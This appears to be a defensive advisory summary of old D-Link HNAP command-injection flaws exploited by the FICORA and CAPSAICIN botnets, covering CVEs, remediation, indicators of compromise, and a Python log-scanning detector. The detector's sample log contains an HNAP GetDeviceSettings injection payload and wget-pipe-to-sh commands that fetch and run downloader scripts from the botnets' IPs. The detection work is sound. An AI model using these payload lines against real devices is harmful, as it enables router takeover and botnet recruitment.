Full Report
Cybersecurity researchers are warning about a spike in malicious activity that involves roping vulnerable D-Link routers into two different botnets, a Mirai variant dubbed FICORA and a Kaiten (aka Tsunami) variant called CAPSAICIN. "These botnets are frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands via a GetDeviceSettings
Analysis Summary
# Vulnerability: Old D-Link Router Vulnerabilities Exploited by FICORA and CAPSAICIN Botnets
## CVE Details
- CVE ID: Multiple, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112
- CVSS Score: Not given in the source text. Treat the issue as high severity: it yields remote command execution and is under active exploitation.
- CWE: Not given in the source text. The reported behaviour (crafted HNAP requests that cause the router to execute attacker-supplied commands) is command injection, i.e. the CWE-77/CWE-78 family.
## Affected Systems
- Products: D-Link routers across multiple models; the flaw sits in the shared HNAP implementation rather than in a single product line.
- Versions: Devices running old, unpatched firmware that still contains the vulnerable HNAP implementation.
- Configurations: Devices with the Home Network Administration Protocol (HNAP) interface enabled, above all where that interface is reachable from the WAN side.
## Vulnerability Description
The vulnerability resides in the D-Link Home Network Administration Protocol (HNAP) interface. A remote attacker sends specially crafted HNAP requests that reference the `GetDeviceSettings` action, and the router passes attacker-controlled input into a command that it executes, giving the attacker arbitrary command execution on the device. The oldest of the listed CVEs dates from 2015, so the weakness has been public for almost a decade, and it is now being used to recruit devices into botnets such as FICORA (a Mirai variant) and CAPSAICIN (a Kaiten/Tsunami variant).
## Exploitation
- Status: Exploited in the wild by the FICORA and CAPSAICIN botnets in global campaigns.
- Complexity: Low. The flaws have been publicly documented for years and are triggered by crafted HNAP requests sent over the network, with no user interaction.
- Attack Vector: Network (remote command execution via the HNAP interface).
## Impact
- Confidentiality: High (Potential for data exposure depending on device function).
- Integrity: High (System compromise, installation of malware).
- Availability: High (Devices are assimilated into DDoS botnets, leading to resource exhaustion).
## Remediation
### Patches
The article implies that fixes exist for the listed CVEs in the form of updated D-Link firmware that remediates the underlying HNAP flaw. Specific fixed firmware versions are not listed in the provided text, so users must check the official D-Link advisory for their specific model and confirm that the model is still supported.
### Workarounds
1. **Disable HNAP:** If the firmware allows it, disable the Home Network Administration Protocol (HNAP) interface on the affected D-Link routers.
2. **Block External Access:** Ensure the HNAP interface (served at the `/HNAP1/` path on the router's web management port) is not exposed to the public internet. Disable remote management on the WAN interface and restrict access to the local network only.
## Detection
- **FICORA Infection:** Look for a downloader deploying a shell script named `"multi"` fetched from IP `103.149.87[.]69`, followed by downloads of payloads for various Linux architectures using `wget`, `ftpget`, `curl`, and `tftp`. The malware includes a brute-force function, so expect follow-on login attempts against other devices.
- **CAPSAICIN Infection:** Look for a downloader script named `"bins.sh"` fetched from IP `87.10.220[.]221`. Once running, the malware kills processes belonging to other known botnets so that it alone controls the device.
- **General Detection:** Look for unusual outbound network activity (flood traffic, connections to the IPs above), unexpected CPU spikes, and processes that kill other processes by name, all of which indicate a hijacked device.
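To turn the indicators above into something that can be run over logs, the following is an added example (not code from the original article, Fortinet, or D-Link). It scans router or IDS log lines for three things: an HNAP request whose `SOAPAction` names `GetDeviceSettings` and carries shell metacharacters, any reference to the two downloader IPs, and a fetch of the `multi` or `bins.sh` script with one of the listed tools. The log line format and the sample lines are constructed for the example; the `SOAPAction` value and the `http://purenetworks.com/HNAP1/` namespace are assumptions about how a logger would render the request.

```python
"""Scan log lines for the FICORA / CAPSAICIN indicators from the Detection section.

Added example; the log format below is an assumption, not a real D-Link log layout.
"""
import re
from collections import Counter

# Indicators from the article (written defanged there; logs carry the raw IPs).
DOWNLOADER_HOSTS = {
    "103.149.87.69": "FICORA downloader host (serves the 'multi' script)",
    "87.10.220.221": "CAPSAICIN downloader host (serves 'bins.sh')",
}
DOWNLOADER_SCRIPTS = {"multi": "FICORA", "bins.sh": "CAPSAICIN"}

# HNAP request with its SOAPAction value, as a logger might render it (assumption).
HNAP_REQ = re.compile(r'/HNAP1.*?SOAPAction="(?P<action>[^"]*)"')
# Shell metacharacters that never belong in a legitimate SOAPAction value.
SHELL_META = re.compile(r"[`;|&]|\$\(")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# One of the four fetch tools named in the article pulling one of the two scripts.
FETCH_RE = re.compile(r"(?:wget|curl|tftp|ftpget)\b.*?/(?P<script>multi|bins\.sh)\b", re.I)


def classify_line(line):
    """Return a list of (label, evidence) tuples for one log line; empty if benign."""
    hits = []
    m = HNAP_REQ.search(line)
    if m and "GetDeviceSettings" in m["action"] and SHELL_META.search(m["action"]):
        hits.append(("hnap_getdevicesettings_injection", m["action"]))
    for ip in IP_RE.findall(line):
        if ip in DOWNLOADER_HOSTS:
            hits.append(("known_downloader_host", f"{ip}: {DOWNLOADER_HOSTS[ip]}"))
    m = FETCH_RE.search(line)
    if m:
        script = m["script"].lower()
        hits.append(("downloader_script_fetch", f"{script} ({DOWNLOADER_SCRIPTS[script]})"))
    return hits


def scan_log(lines):
    """Run classify_line over every line and return findings with 1-based line numbers."""
    findings = []
    for n, line in enumerate(lines, 1):
        for label, evidence in classify_line(line):
            findings.append({"line": n, "label": label, "evidence": evidence})
    return findings


def summarize(findings):
    """Count findings per label, e.g. to decide whether a device needs to be pulled."""
    return Counter(f["label"] for f in findings)


# Constructed sample log (not real traffic). Line 1 is an exploitation attempt that
# also pulls the FICORA script; line 2 is a legitimate HNAP call; lines 3 and 4 show
# the CAPSAICIN downloader host and script; line 5 is unrelated noise.
SAMPLE_LOG = [
    'Dec 27 10:02:11 gw httpd: 198.51.100.23 POST /HNAP1/ SOAPAction="http://purenetworks.com/HNAP1/GetDeviceSettings/`wget http://103.149.87.69/multi -O /tmp/m; sh /tmp/m`"',
    'Dec 27 10:02:12 gw httpd: 192.168.0.10 POST /HNAP1/ SOAPAction="http://purenetworks.com/HNAP1/GetDeviceSettings"',
    "Dec 27 10:02:13 gw kernel: OUT=ppp0 SRC=192.0.2.1 DST=87.10.220.221 PROTO=TCP DPT=80",
    "Dec 27 10:02:14 gw sh[1337]: wget http://87.10.220.221/bins.sh -O- | sh",
    "Dec 27 10:03:00 gw dnsmasq: query[A] example.com from 192.168.0.10",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['label']} -> {f['evidence']}")
    print(dict(summarize(scan_log(SAMPLE_LOG))))
```

The HNAP check deliberately keys on shell metacharacters in the `SOAPAction` value rather than on a fixed payload string, so it also catches variants that fetch from hosts other than the two listed here; the host and script checks are exact matches on the published indicators and will need updating as the campaign moves infrastructure.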
## References
- Vendor Advisories: Consult the D-Link security bulletins for CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112; the Fortinet FortiGuard Labs analysis linked below covers the botnet activity.
- Relevant links:
- hxxps://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilities
- NVD entry for CVE-2015-2051
- NVD entry for CVE-2019-10891
- NVD entry for CVE-2022-37056
- NVD entry for CVE-2024-33112